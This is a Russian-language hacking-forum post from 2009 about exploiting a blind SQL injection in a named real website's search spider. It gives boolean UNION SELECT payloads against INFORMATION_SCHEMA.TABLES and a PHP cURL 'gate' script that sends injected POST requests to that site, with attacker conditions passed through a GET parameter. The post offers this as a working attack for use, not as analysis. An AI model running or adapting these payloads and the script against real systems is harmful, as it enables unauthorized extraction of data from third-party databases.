16.11.2009, 16:58
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Сообщение от l1ght
вот для кого люди стараются ?  https://forum.antichat.ru/showpost.php?p=1630322&postcount=13 Там описан метод как найти таблы если пага не меняется, но есть вывод ошибок, и то там брутом 
А тут пага меняется, при TRUE говорит "присутствует в базе данных" если FALSE - не говорит
http://' UNION SELECT 1,2 FROM INFORMATION_SCHEMA.TABLES WHERE 1=1#
http://' UNION SELECT 1,2 FROM INFORMATION_SCHEMA.TABLES WHERE 1=2#
Если запрос вернёт "1" скрипт говорит "присутствует в базе данных", просто Union select 1,2 не вернёт, поэтому надо из таблы, и добовляем условие
Хакеры... 
Нате вам гейт для GET Запроса
PHP код:
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://search.sakh-sun.ru/spider.php");
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'url=http%3A%2F%2F2q%27+UNION+SELECT+1%2C2+FROM+information_schema.tables+WHERE+1%3D1'.$_GET['c'].'&soption=level&maxlevel=2&in=&out=');
curl_exec($ch);
curl_close($ch);
?>
Можно будет юзать script.php?c=%20AND 1=1%23
Ну я для себя делал потомучо мне быстрее гейт написать, чем настроить тузлу на POST
Последний раз редактировалось Ponchik; 16.11.2009 в 17:10..
|
|
|